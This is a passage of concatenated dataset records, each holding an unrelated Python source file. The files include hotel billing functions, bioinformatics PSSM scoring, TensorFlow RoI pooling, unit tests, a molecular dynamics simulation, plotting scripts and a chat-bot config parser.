(int(variables.entDialogoServicios[i].get_text()), servicios[i]))\n            conexion.cur.execute('UPDATE SERVICIOS SET PRECIO = ? WHERE SERVICIO = ?', (int(variables.entDialogoServicios[i].get_text()), servicios[i]))\n        conexion.conex.commit()\n        listServicios()\n    except Exception as e:\n        print('Error in funcionesServicios cambiarPrecios ', e)\n\ndef listServicios():\n    '''Function that lists the services of a given reservation and shows them in the billing grid.\n\n    @return:\n    '''\n    try:\n        for i in range(6):\n            for j in range(4):\n                variables.gridServicios.get_child_at(j, i + 2).set_text(\"\")\n        dniCliente = variables.entFactura[0].get_text()\n        conexion.cur.execute('SELECT SERVICIO FROM SERVICIOS WHERE DNICLIENTE = ?', (dniCliente,))\n        listaTuplasServicios = conexion.cur.fetchall()\n        listaServicios = []\n        for registro in listaTuplasServicios:\n            listaServicios.append(registro[0])\n        print(listaServicios)\n        listaPrecios = []\n        for registro in listaServicios:\n            conexion.cur.execute('SELECT SERVICIO, PRECIO FROM SERVICIOS WHERE SERVICIO = ? 
AND DNICLIENTE = ?', (registro,dniCliente))\n            listaPrecios.append(conexion.cur.fetchall())\n        print(listaPrecios)\n        conexion.conex.commit()\n        entriesGrid = []\n        numeroNoches = variables.gridServicios.get_child_at(1, 1).get_text()\n        for i in range(len(listaPrecios)):\n            entriesGrid.append((listaPrecios[i][0][0], numeroNoches, listaPrecios[i][0][1], str(float(listaPrecios[i][0][1]) * float(numeroNoches))))\n        for i in range(len(entriesGrid)):\n            print(i)\n            for j in range(4):\n                print(j)\n                variables.gridServicios.get_child_at(j, i+2).set_text(entriesGrid[i][j])\n                print(variables.gridServicios.get_child_at(j, i+2).get_text())\n    except Exception as e:\n        print('Error listing services', e)\n\ndef listTreeServicios():\n    '''Function that lists the services of a given reservation and shows them in the Services treeView.\n\n    @return:\n    '''\n    try:\n        variables.listServicios.clear()\n        dniCliente = variables.entFactura[0].get_text()\n        conexion.cur.execute('SELECT CODIGO, DNICLIENTE, SERVICIO, PRECIO FROM SERVICIOS WHERE DNICLIENTE = ? AND SERVICIO NOT IN (?,?,?)', (dniCliente,\"DESAYUNO\",\"COMIDA\",\"PARKING\"))\n        listado = conexion.cur.fetchall()\n        for tupla in listado:\n            variables.listServicios.append(tupla[0:4])\n    except Exception as e:\n        print('Error listing services', e)\n\ndef limpiarEntServicios():\n    try:\n        variables.entServicioAdicional.set_text(\"\")\n        variables.entPrecioServicioAdicional.set_text(\"\")\n    except Exception as e:\n        print(\"Error clearing services\", e)\n\n\n","sub_path":"funcionesServicios.py","file_name":"funcionesServicios.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"18764636","text":"from Bio import SeqIO\nfrom Bio.Alphabet import IUPAC\nfrom Bio.PDB import PDBParser\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\nfrom Bio.SeqUtils import IUPACData\nfrom Bio.SubsMat.MatrixInfo import blosum62, pam30\nfrom subprocess import Popen, PIPE\n\nimport os\nimport time\n\nSWISSPROT_PATH = os.path.abspath(\"/data/Database/blast/db/swissprot\")\nUNIREF90_PATH = os.path.abspath(\"/data/Database/blast/db/uniref90.fa\")\n\nclass BLOSUM62(object):\n    def __init__(self,aa_from,aa_to):\n        self.aa_from = aa_from\n        self.aa_to = aa_to\n    \n    def run(self):\n        score = int()\n        try:\n            score = blosum62[(self.aa_from,self.aa_to)]\n        except KeyError:\n            score = blosum62[(self.aa_to,self.aa_from)]\n        return {'blosum62':score}\n\nclass PAM30(object):\n    def __init__(self,aa_from,aa_to):\n        self.aa_from = aa_from\n        self.aa_to = aa_to\n    \n    def run(self):\n        score = int()\n        try:\n            score = pam30[(self.aa_from,self.aa_to)]\n        except KeyError:\n            score = pam30[(self.aa_to,self.aa_from)]\n        return {'pam30':score}\n\nclass PSSM(object):\n    def __init__(self,pdb_file,chain,mutation):\n        self.pdb_file = pdb_file\n        self.chain = chain\n        self.mutation = mutation\n        self.aa_from = mutation[0]\n        self.aa_to = mutation[-1]\n        self.mapping_dict = dict()\n    \n    def get_fasta_from_PDB(self):\n        parser = PDBParser()\n        structure = parser.get_structure(self.pdb_file, self.pdb_file)\n        model = structure[0]\n        chain = [chain for chain in model if chain.id == self.chain][0]\n        sequence = str()\n\n        for i,residue in enumerate(chain.get_residues()):\n            self.mapping_dict[str(residue.id[1])] = i+1\n            sequence += IUPACData.protein_letters_3to1[residue.resname.title()]\n\n        seq_id = str(time.time()).replace('.','')\n        protein_name = 'protein_{}'.format(seq_id)\n        fasta_file = self.pdb_file.replace('.pdb','.{}.fasta'.format(seq_id))\n        record = 
(SeqRecord(Seq(sequence, IUPAC.protein), id=protein_name, description=\"\"))\n SeqIO.write(record, fasta_file, \"fasta\")\n\n return fasta_file\n \n def get_score_from_file(self,ascii_file):\n mut_dic={'A':2,'R':3, 'N':4, 'D':5, 'C':6, 'Q':7, 'E':8, 'G':9, 'H':10, 'I':11, 'L':12, 'K':13, 'M':14, 'F':15, 'P':16, 'S':17, 'T':18, 'W':19, 'Y':20, 'V':21}\n whole_list=[['residue_number','residue_name','A','R','N','D','C','Q','E','G','H','I','L','K','M','F','P','S','T','W','Y','V']]\n\n pssm_lines = open(ascii_file,'r').readlines()\n\n for line in pssm_lines:\n if len(line) > 180:\n temp_list = list()\n resID_n_name = list(filter(None,line[0:10].split(' ')))\n score_list = list(filter(None,line[10:92].split(' ')))\n\n temp_list.extend(resID_n_name)\n temp_list.extend(score_list)\n whole_list.append(temp_list)\n\n elif len(line) == 162:\n temp_list = list()\n resID_n_name = list(filter(None,line[0:10].split(' ')))\n score_list = list(filter(None,line[10:71].split(' ')))\n\n temp_list.extend(resID_n_name)\n temp_list.extend(score_list)\n whole_list.append(temp_list)\n\n residue_number = self.mapping_dict[self.mutation[1:-1]]\n score = int(whole_list[residue_number][mut_dic.get(self.mutation[-1])])\n return score\n\n def run(self):\n fasta_file = self.get_fasta_from_PDB()\n # dbs = {'swissprot':SWISSPROT_PATH,'uniref90':UNIREF90_PATH}\n dbs = {'swissprot':SWISSPROT_PATH}\n\n results = dict()\n for db_name,db_path in dbs.items():\n log_file_PAM30 = fasta_file.replace('.fasta','.{}.log'.format('PAM30.'+db_name))\n ascii_file_PAM30 = fasta_file.replace('.fasta','.{}.ascii'.format('PAM30.'+db_name))\n output_PAM30 = Popen([\"psiblast\", \"-db\", db_path, \"-query\", fasta_file, \"-evalue\", \"1e-10\", \"-out\", log_file_PAM30, \"-num_iterations\", \"3\", \"-out_ascii_pssm\", ascii_file_PAM30, \"-matrix\", \"PAM30\", \"-seg\", \"yes\", \"-num_threads\", \"6\", \"-comp_based_stats\", \"1\"],stdout=PIPE,stderr=PIPE).communicate()[0]\n\n results[\"pssm_{}\".format('PAM30_'+db_name)] = self.get_score_from_file(ascii_file_PAM30)\n\n # log_file_BLOSUM62 = fasta_file.replace('.fasta','.{}.log'.format('BLOSUM62.'+db_name))\n # ascii_file_BLOSUM62 = fasta_file.replace('.fasta','.{}.ascii'.format('BLOSUM62.'+db_name))\n # output_BLOSUM62 = Popen([\"psiblast\", \"-db\", db_path, \"-query\", fasta_file, \"-evalue\", \"1e-10\", \"-out\", log_file_BLOSUM62, \"-num_iterations\", \"3\", \"-out_ascii_pssm\", ascii_file_BLOSUM62, \"-matrix\", \"BLOSUM62\", \"-seg\", \"yes\", \"-num_threads\", \"6\", \"-comp_based_stats\", \"1\"],stdout=PIPE,stderr=PIPE).communicate()[0]\n #\n # results[\"pssm_{}\".format('BLOSUM62_'+db_name)] = self.get_score_from_file(ascii_file_BLOSUM62)\n\n\n return results\n","sub_path":"substitution_matrices.py","file_name":"substitution_matrices.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"339901327","text":"import os\n\n# Specify the directory you want to start from\nrootDir = 'E:/ai_integration2/MyProject8/Plugins/GPT2_Conv_AI_Plugin_UE/Source/GPT2_Conv_AI_Plugin_UE/ThirdParty/pytorch-main (2)'\n\nfor dirName, subdirList, fileList in os.walk(rootDir):\n for fname in fileList:\n if fname.endswith('.cpp'):\n include = '#include \"{}\"'.format(fname.replace('.cpp', '.h'))\n \n with open(os.path.join(dirName, fname), 'r', encoding='utf-8') as f:\n content = f.read()\n with open(os.path.join(dirName, fname), 'w', encoding='utf-8') as f:\n f.write(include + '\\n' + 
content)\n\nprint(\"Done!\")\n","sub_path":"Unreal Plugin Development/Fix PyTorch Import initial errors.py","file_name":"Fix PyTorch Import initial errors.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"54977270","text":"# coding: utf-8\n\nimport unittest\nimport random\nimport tempfile\nfrom pathlib import Path\n\nfrom .context import dgp\nfrom dgp.lib.gravity_ingestor import read_at1a\nfrom dgp.lib.project import *\nfrom dgp.lib.meterconfig import *\n\n\nclass TestProject(unittest.TestCase):\n\n def setUp(self):\n \"\"\"Set up some dummy classes for testing use\"\"\"\n self.todelete = []\n self.project = AirborneProject(path='tests', name='Test Airborne Project')\n\n # Sample values for testing meter configs\n self.meter_vals = {\n 'gravcal': random.randint(200000, 300000),\n 'longcal': random.uniform(150.0, 250.0),\n 'crosscal': random.uniform(150.0, 250.0),\n 'cross_lead': random.random()\n }\n self.at1a5 = MeterConfig(name=\"AT1A-5\", **self.meter_vals)\n self.project.add_meter(self.at1a5)\n\n def test_project_directory(self):\n \"\"\"\n Test the handling of the directory specifications within a project\n Project should take an existing directory as a path, raising FileNotFoundError if it doesnt exist.\n If the path exists but is a file, Project should automatically strip the leaf and use the parent path.\n \"\"\"\n with self.assertRaises(FileNotFoundError):\n project = GravityProject(path=Path('tests/invalid_dir'))\n\n with tempfile.TemporaryDirectory() as td:\n project_dir = Path(td)\n project = GravityProject(path=project_dir)\n self.assertEqual(project.projectdir, project_dir)\n\n # Test exception given a file instead of directory\n with tempfile.NamedTemporaryFile() as tf:\n tf.write(b\"This is not a directory\")\n with self.assertRaises(NotADirectoryError):\n project = GravityProject(path=Path(str(tf.name)))\n\n def test_pickle_project(self):\n # TODO: Add further complexity to testing of project pickling\n flight = Flight(None, 'test_flight', self.at1a5)\n flight.add_line(100, 250.5)\n self.project.add_flight(flight)\n\n with tempfile.TemporaryDirectory() as td:\n save_loc = Path(td, 'project.d2p')\n self.project.save(save_loc)\n\n loaded_project = AirborneProject.load(save_loc)\n self.assertIsInstance(loaded_project, AirborneProject)\n self.assertEqual(len(loaded_project.flights), 1)\n self.assertEqual(loaded_project.flights[flight.uid].uid, flight.uid)\n self.assertEqual(loaded_project.flights[flight.uid].meter.name, 'AT1A-5')\n\n def test_flight_iteration(self):\n test_flight = Flight(None, 'test_flight', self.at1a5)\n line0 = test_flight.add_line(100.1, 200.2)\n line1 = test_flight.add_line(210, 350.3)\n lines = [line0, line1]\n\n for line in test_flight:\n print(line)\n self.assertTrue(line in lines)\n\n # TODO: Fix ImportWarning generated by pytables?\n @unittest.skip('New add_data test not implemented')\n def test_associate_flight_data(self):\n \"\"\"Test adding a data file and associating it with a specific flight\"\"\"\n self.todelete.append('tests/prjdata.h5') # Cleanup when done\n\n flt = Flight(self.at1a5)\n self.project.add_flight(flt)\n\n data1 = 'tests/test_data.csv'\n self.project.add_data(data1, flight=flt)\n\n data1path = os.path.abspath(data1)\n self.assertTrue(data1path in self.project.data_sources.values())\n\n test_df = read_at1m(data1)\n grav_data, gps_data = self.project.get_data(flt)\n self.assertTrue(test_df.equals(grav_data))\n 
self.assertIsNone(gps_data)\n\n\nclass TestFlight(unittest.TestCase):\n def setUp(self):\n pass\n\n\nclass TestMeterconfig(unittest.TestCase):\n def setUp(self):\n self.ini_path = os.path.abspath('tests/at1m.ini')\n self.config = {\n 'g0': 10000.0,\n 'GravCal': 227626.0,\n 'LongCal': 200.0,\n 'CrossCal': 200.1,\n 'vcc': 0.0,\n 've': 0.0,\n 'Cross_Damping': 550.0,\n 'Long_Damping': 550.0,\n 'at1_invalid': 12345.8\n }\n\n def test_MeterConfig(self):\n mc = MeterConfig(name='Test-1', **self.config)\n self.assertEqual(mc.name, 'Test-1')\n\n # Test get, set and len methods of the MeterConfig class\n self.assertEqual(len(mc), len(self.config))\n\n for k in self.config.keys():\n self.assertEqual(mc[k], self.config[k])\n # Test case-insensitive handling\n self.assertEqual(mc[k.lower()], self.config[k])\n\n mc['g0'] = 500.01\n self.assertEqual(mc['g0'], 500.01)\n self.assertIsInstance(mc['g0'], float)\n # Test the setting of non-float types\n mc['monitor'] = True\n self.assertTrue(mc['monitor'])\n\n mc['str_val'] = 'a string'\n self.assertEqual(mc['str_val'], 'a string')\n\n # Test the class handling of invalid requests/types\n with self.assertRaises(NotImplementedError):\n mc[0: 3]\n\n with self.assertRaises(NotImplementedError):\n MeterConfig.from_ini(self.ini_path)\n\n def test_AT1Meter_config(self):\n at1 = AT1Meter('AT1M-5', **self.config)\n\n self.assertEqual(at1.name, 'AT1M-5')\n\n # Test that invalid field was not set\n self.assertIsNone(at1['at1_invalid'])\n valid_fields = {k: v for k, v in self.config.items() if k != 'at1_invalid'}\n for k in valid_fields.keys():\n # Check all valid fields were set\n self.assertEqual(at1[k], valid_fields[k])\n\n def test_AT1Meter_from_ini(self):\n at1 = AT1Meter.from_ini(self.ini_path)\n\n # Check type inheritance\n self.assertIsInstance(at1, AT1Meter)\n self.assertIsInstance(at1, MeterConfig)\n\n self.assertEqual(at1.name, 'AT1M-1U')\n\n cfp = configparser.ConfigParser(strict=False) # strict=False to allow for duplicate keys in config\n cfp.read(self.ini_path)\n\n skip_fields = ['meter', '00gravcal']\n for k, v in cfp['Sensor'].items():\n if k in skip_fields:\n continue\n self.assertEqual(float(cfp['Sensor'][k]), at1[k])\n\n\n\n","sub_path":"tests/test_project.py","file_name":"test_project.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"364784554","text":"import tensorflow as tf \nimport numpy as np\n\nslim = tf.contrib.slim\n\ndef roi_pool_layer(net,rois):\n \"\"\"RoI pooling layer uses max pooling to convert the\n features inside any valid region of interest into [7,7] feature map.\n\n Args:\n net: a tensor with shape [feature_map_height,feature_map_width,1024], it is an output of mobilenet v1\n rois: a tensor with shape [num_rois,5]\n Returns:\n fc: a tensor with shape [num_rois,7,7,1024] \n \"\"\"\n net_shape = tf.shape(net)\n height = tf.to_float(net_shape[0]) * 16.\n width = tf.to_float(net_shape[1]) * 16.\n batch_ids = tf.squeeze(tf.slice(rois, [0, 0], [-1, 1], name=\"batch_id\"), [1])\n x1 = tf.slice(rois, [0, 1], [-1, 1], name=\"x1\") / width\n y1 = tf.slice(rois, [0, 2], [-1, 1], name=\"y1\") / height\n x2 = tf.slice(rois, [0, 3], [-1, 1], name=\"x2\") / width\n y2 = tf.slice(rois, [0, 4], [-1, 1], name=\"y2\") / height\n \n # Won't be back-propagated to rois anyway, but to save time\n bboxes = tf.stop_gradient(tf.concat([y1, x1, y2, x2], axis=1))\n pre_pool_size = 7 * 2\n crops = tf.image.crop_and_resize(net, bboxes, tf.to_int32(batch_ids), 
[pre_pool_size, pre_pool_size], name=\"crops\")\n\n fc = slim.max_pool2d(crops, [2, 2], padding='SAME')\n return fc","sub_path":"layer_utils/roi_pool_layer.py","file_name":"roi_pool_layer.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"161470852","text":"from django.contrib import admin\nfrom django.urls import path, include\n\nurlpatterns = [\n\n path('admin/', admin.site.urls, name='admin-page'),\n path('employee/', include('employees.urls')),\n path('login/', include('login.urls')),\n path('register/', include('register.urls')),\n\n]\n","sub_path":"Employee/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"18314564","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 8 08:32:17 2016\n\n@author: khaile\n\"\"\"\n\nbalance = 484\nannualInterestRate = 0.2\nmonthlyPaymentRate = 0.04\n\nfor n in range(12):\n monthlyPayment = balance * monthlyPaymentRate\n unpaidBalance = balance - monthlyPayment\n balance = unpaidBalance + annualInterestRate/12 * unpaidBalance\n \nprint(\"Remaining balance: \", round(balance, 2))","sub_path":"problem set 2/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"605670273","text":"#%%\nimport numpy as np\nimport wave\nimport matplotlib.pyplot as plt\n\nimport os\nimport subprocess\nimport logging\nimport traceback\n\n#%%\noutputdir = os.path.abspath(\"wavefiles\")\nfor root, dirs, files in os.walk('.'):\n for f in files:\n path = os.path.join(root, f)\n base, ext = os.path.splitext(f)\n outputpath = os.path.join(outputdir, base + \".wav\")\n if ext == '.m4a':\n print(f'converting {path} to {outputpath}')\n status, output = subprocess.getstatusoutput(f'ffmpeg -i {path} {outputpath}')\n if status:\n logging.error (output)\n\n#%%\ndef read_wave(file_name):\n wavefile = wave.open(file_name, \"r\")\n framerate = wavefile.getframerate()\n data = wavefile.readframes(wavefile.getnframes())\n x = np.frombuffer(data, dtype=\"int16\")\n return x, framerate\n\n#%%\nv, fs = read_wave(\"wavefiles/input.wav\")\nprint(v.shape)\n\nr = np.arange(200)\nplt.plot(v[r])\nplt.ylabel('Amplitude')\nplt.show()\n","sub_path":"read_wave.py","file_name":"read_wave.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"302341570","text":"\nimport numpy as np\nimport InitialValues as init\nimport Simulation as sim\n\n# Variables\n# eps = 119.8 * 1.38064852 * 10**-23\n# sig = 3.405 * 10 ** -10\n\nAlgorithm = 'Verlet'\nNdim = 3 # Dimensions\nNpts = 5 # Number of spots\nLbox = 5 # Length of the box\nhstep = 0.004 # Time-step\nIter = 1 # Iterations\n\n\nNumdim = 3 #Width/height of big box\nNbox = Numdim**Ndim #Number of boxes\n\nremovethis = 1 # Check boxes beyond initial box\n\n\n\n# Function for relocating particles to initial box\ndef checkXbox(Xn, Lbox):\n Low = Xn < 0\n Hig = Xn > Lbox\n while any(Xn[Low] < 0):\n Low = Xn < 0\n Xn[Low] += Lbox\n while any(Xn[Hig] > Lbox):\n Hig = Xn > Lbox\n Xn[Hig] -= Lbox\n return Xn\n\n# Simulate initial positions\nXn = init.Latticepos(Npts,Lbox,Ndim)\n\n# Zero initial velocity and force\nVn = np.zeros((Npts,Ndim))\nFn = np.zeros((Npts,Ndim))\nfn = np.zeros((Npts,Ndim))\n\n\n# 
Create translation matrix\naddvec = np.array(np.linspace(-removethis,removethis,num=Numdim))*Lbox #Basic vector for matrix translation\naddarrx = np.tile(addvec,[1,Numdim]) #2D x translation matrix\naddarry = np.repeat(addvec,Numdim) #2D y translation matrix\n\nif Ndim == 2:\n addarr = np.vstack((addarrx,addarry)) #Combined 2D translation matrix\nelif Ndim == 3:\n addarrx = np.tile(addarrx,[1,Numdim]) #3D x TM\n addarry = np.tile(addarry,[1,Numdim]) #3D y TM\n addarrz = np.repeat(addvec,Numdim**2) #3D z TM\n addarr = np.vstack((addarrx,addarry,addarrz)) #Combined 3D TM\n\n# Initial Fn\n#########################################################\nabocor = np.zeros([Npts*Nbox,Ndim]) #Empty coordinates matrix\nidx = 0\nfor i_b in range(Nbox):\n for i_bs in range(Npts):\n abocor[idx,:] = Xn[i_bs,:] + addarr[:,i_b] #Get coordinates of particles in neighbor boxes\n idx += 1\n\nUn = np.zeros(Npts)\nfor i_bs in range(Npts):\n abodisc = (abocor - Xn[i_bs][np.newaxis,:]) #Distances from spot in central box\n abodisr = np.sqrt(np.sum(abodisc**2, axis=1)) #Distances R from spot\n\n self = abodisr != 0 #Find self in abodis matrices\n abodisr = abodisr[self] #Remove self from abodisr\n abodisc = abodisc[self,:] #Remove self from abodisc\n\n adudrr = 24*(abodisr**-8 -2*abodisr**-14) #dU/dr * 1/r\n Fn[i_bs,:] = np.sum(-abodisc*\n np.transpose([adudrr]), axis=0) #Force on particle on n\n Un[i_bs] = sum(4*(abodisr**-12-abodisr**-6)) #Pot. Energy on n\n#########################################################\n\nfor i_t in range(Iter):\n\n Kn = 1/2 * np.sum(Vn**2, axis = 1) #Kin. Energy on n\n En = np.array([Un, Kn, Un + Kn]) #Total energy p. particle on n\n Tn = np.sum(En,axis = 1) #Total system energy (per box)\n\n if Algorithm == \"Verlet\":\n Xn = Xn + Vn*hstep + hstep**2/2*Fn #X on n+1 (Verlet)\n elif Algorithm == \"Euler\":\n Xn = Xn + Vn * hstep #X on n+1 (Euler)\n\n Xn = checkXbox(Xn,Lbox)\n\n abocor = np.zeros([Npts * Nbox, Ndim]) # Empty coordinates matrix\n idx = 0\n for i_b in range(Nbox):\n for i_bs in range(Npts):\n abocor[idx, :] = Xn[i_bs, :] + addarr[:, i_b] # Get coordinates of particles in neighbor boxes\n idx += 1\n\n Un = np.zeros((Npts))\n for i_bs in range(Npts):\n abodisc = (abocor - Xn[i_bs][np.newaxis,:]) #Distances from spot in central box\n abodisr = np.sqrt(np.sum(abodisc**2, axis=1)) #Distances R from spot\n\n self = abodisr != 0 #Find self in abodis matrices\n abodisr = abodisr[self] #Remove self from abodisr\n abodisc = abodisc[self,:] #Remove self from abodisc\n\n adudrr = 24*(abodisr**-8 -2*abodisr**-14) #dU/dr * 1/r\n fn[i_bs,:] = np.sum(-abodisc*\n np.transpose([adudrr]), axis=0) #Force on particle on n + 1\n\n Un[i_bs] = sum(4*(abodisr**-12-abodisr**-6)) #Pot. 
Energy on n\n\n if Algorithm == \"Verlet\":\n Vn = Vn + hstep/2*(Fn+fn) #V on n+1 (Verlet)\n elif Algorithm == \"Euler\":\n Vn = Vn + Fn * hstep #V on n+1 (Euler)\n\n Fn = fn[:] #Overwrite Fn(n) with fn(n+1)\n","sub_path":"OLD/Day3.py","file_name":"Day3.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"345010103","text":"\"\"\"\nThis repo is based on https://github.com/wanglouis49/pytorch-weights_pruning code.\n\"\"\"\nimport os \nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nimport pdb\n\nVALID_SIG = \"Valid\"\nACC_SIG = \"Test accuracy: \"\nTEST_SIG = \"Test on test set\"\n\n\n\ndef read_acc(file_name, sig, length=5):\n\tis_valid = False\n\tis_test = False\n\tfile = open(file_name, \"r\")\n\tacc = [0]\n\tsig_len = len(sig)\n\ttest_acc = -1\n\tfor l in file:\n\t\tif VALID_SIG in l:\n\t\t\tis_valid = True\n\t\tif TEST_SIG in l:\n\t\t\tis_test = True\n\t\tif (sig in l) and is_valid:\n\t\t\tacc.append(float(l[sig_len:sig_len+length]))\n\t\t\tis_valid = False\n\t\tif (sig in l) and is_test:\n\t\t\ttest_acc = float(l[sig_len:sig_len+length])\n\t\t\tis_test = False\n\tfile.close()\n\t#acc.append(test_acc)\n\treturn np.array(acc), test_acc\n\n\n\ndef reverse_smooth(acc):\n\tacc_new = []\n\t#print(acc)\n\tfor i in range(acc.shape[0]):\n\t\tif i >= 1:\n\t\t\tacc_new.append(np.mean(acc[(i-1):(i+1)]))\n\t\tif i==0:\n\t\t\tacc_new.append(acc[i])\n\treturn np.array(acc_new)\n\n\ndef smooth(acc):\n\tacc_new = []\n\tfor i in range(acc.shape[0]):\n\t\tif i < acc.shape[0]-3:\n\t\t\tacc_new.append(np.mean(acc[(i):(i+3)]))\n\t\telse:\n\t\t\tacc_new.append(acc[i])\n\treturn np.array(acc_new)\n\nratio = [0.005, 0.01, 0.05, 0.1]\ntrue_ratio = []\n\nplot_lines = [-1]\n\nexpand = True\ninits = []\nepochs = [20, 30, 40, 50, 60, 70, 80, 90, 100]\n\nfor r in ratio:\n\tinit_test_accs = []\n\tfor epoch in epochs:\n\t\tinit_acc, init_test_acc = read_acc(str(r)+\"/init_enhance\"+str(epoch)+\"_m\"+str(r)+\"_warmup0.1.log\", ACC_SIG)\n\t\tinit_test_accs.append(init_test_acc)\n\tinits.append(init_test_accs)\n\n\nfigure_num = 0\n\ndot = [\"v-\", \"o-\", \"^-\", \".-\"]\nfor expand in [False]:\n\tplt.figure(figure_num, figsize=(5,4))\n\tpdb.set_trace()\n\tfor r in range(len(ratio)):\n\t\t#print(inits[r])\n\t\tif r < 2:\n\t\t\tplt.plot(epochs, reverse_smooth(np.array(inits[r])), dot[r], linewidth=2.0, label=str(ratio[r]))\n\t\telse:\n\t\t\tplt.plot(epochs, np.array(inits[r]), dot[r], linewidth=2.0, label=str(ratio[r]))\n\tplt.xlabel(\"Training epochs\", fontsize=18)\n\tplt.ylabel(\"Test Accuracy (%)\", fontsize=18)\n\t\n\tplt.legend(loc=\"best\", fontsize=12)\n\tplt.xticks(fontsize=15)\n\tplt.yticks(fontsize=15)\n\t# if expand:\n\t\t# plt.ylim((85, 95))\n\t\t# plt.xlim((50, 100))\n\t# else:\n\t#plt.ylim((40, 85))\n\tplt.tight_layout()\n\n\tif expand:\n\t\tplt.savefig(\"learning_rate_expand.pdf\")\n\telse:\n\t\tplt.savefig(\"learning_rate.pdf\")\n\tplt.show()\n\tfigure_num += 1 \n","sub_path":"trained_log/cifar/learning_rate/plot_convergence.py","file_name":"plot_convergence.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"191371702","text":"import abc\nfrom typing import Dict, get_type_hints, Union, List, Any, Type\nfrom inspect import isclass\nfrom ruamel.yaml import CommentedMap, CommentedSeq\nfrom .common_types import TriggerOrResponse, GlobalsDict\nfrom .boolean_helper import BooleanHelper\nfrom 
..dict_enum import DictEnum\n\n\nclass TriggerOrResponseParser(abc.ABC):\n \"\"\" A common base parser for trigger/response configuration parsers\"\"\"\n\n def __init__(self, mapping_class: Type[DictEnum], element_base_class: Type[TriggerOrResponse]):\n self.__mapping_class = mapping_class\n self.__element_base_class = element_base_class\n\n @property\n def mapping_class(self) -> Type[DictEnum]:\n \"\"\" Returns the mapping class (`Triggers` or `Responses`)\"\"\"\n return self.__mapping_class\n\n @property\n def element_base_class(self) -> Type[TriggerOrResponse]:\n \"\"\" Returns the element base class (`BaseTrigger` or `BaseResponse`)\"\"\"\n return self.__element_base_class\n\n def parse_atomic(self, config: Dict[str, Any]) -> TriggerOrResponse:\n \"\"\"\n Parses an atomic configuration subtree as a trigger/response\n :param config: A configuration subtree to parse\n :return: The trigger/response object created from the given configuration subtree\n \"\"\"\n config_copy = dict(config)\n name = None\n if 'name' in config_copy:\n name = config_copy.pop('name')\n\n element = self.mapping_class[config_copy.pop('type')]\n\n # Some triggers (most of them) are classes and some are instances (mostly filter triggers).\n # This allows both cases to be used.\n # TODO: this comment does not seem to be correct any more. Try removing the case outside\n # the \"if\" block; All triggers and responses seem to be classes.\n if isclass(element):\n trigger_or_response = element(**config_copy)\n if name:\n trigger_or_response.name = name\n return trigger_or_response\n return element\n\n def parse_single(self, config: Union[CommentedMap, str], global_elements: GlobalsDict) \\\n -> TriggerOrResponse:\n \"\"\"\n Recursively parses a single configuration subtree as a trigger/response\n :param config: A configuration subtree to parse\n :param global_elements: A dictionary with all triggers and responses configured globally\n :return: The trigger/response object created from the given configuration subtree\n \"\"\"\n if isinstance(config, str):\n return BooleanHelper.parse_boolean_subrule(config, global_elements)\n\n config_copy = dict(config)\n parameters_to_parse = self.__find_parameters_to_parse_as_subelement(config)\n config.pop('type')\n\n for parameter in parameters_to_parse:\n config_copy[parameter] = self.parse_single(config[parameter], global_elements)\n\n return self.parse_atomic(config_copy)\n\n def parse_many(self, config: CommentedSeq, global_elements: GlobalsDict) \\\n -> Dict[str, TriggerOrResponse]:\n \"\"\"\n Parse all triggers/responses in a configuration\n :param config: A configuration subtree to config as a list of triggers/responses\n :param global_elements: A dictionary with all triggers and responses configured globally\n :return: A dictionary where keys are the original keys from the given configuration subtree\n and values are triggers/responses\n \"\"\"\n return {\n element['name']: self.parse_single(element, global_elements)\n for element\n in config\n }\n\n def __find_parameters_to_parse_as_subelement(self, config: CommentedMap) -> List[str]:\n \"\"\"\n Finds parameters in configuration which should be parsed as triggers/responses themselves\n (For example, when using a trigger/response that gets another trigger/response as a\n parameter).\n :param config: A configuration subtree to parse\n :return: List of the found parameter names\n \"\"\"\n\n mapping_class_constructor = self.mapping_class[config['type']].__init__\n parameters_type_hints = get_type_hints(mapping_class_constructor)\n 
parameters_to_parse = []\n\n for parameter_name in config:\n\n # Meta-parameters to ignore\n if parameter_name in ['type', 'name']:\n continue\n\n # If this parameter has no type hint, we cannot check if it should be parsed or not\n if parameter_name not in parameters_type_hints:\n continue\n\n type_hint = parameters_type_hints[parameter_name]\n\n origin_type = getattr(type_hint, '__origin__', None)\n\n if origin_type is not None:\n if origin_type == Union:\n if self.element_base_class in type_hint.__args__:\n parameters_to_parse.append(parameter_name)\n else:\n raise NotImplementedError(f'Origin type {origin_type} '\n f'is currently not supported')\n elif isclass(type_hint) and issubclass(type_hint, self.element_base_class):\n parameters_to_parse.append(parameter_name)\n\n return parameters_to_parse\n","sub_path":"gramhopper/configuration/trigger_or_response_parser.py","file_name":"trigger_or_response_parser.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"160844654","text":"# SGDC Stochastic gradient 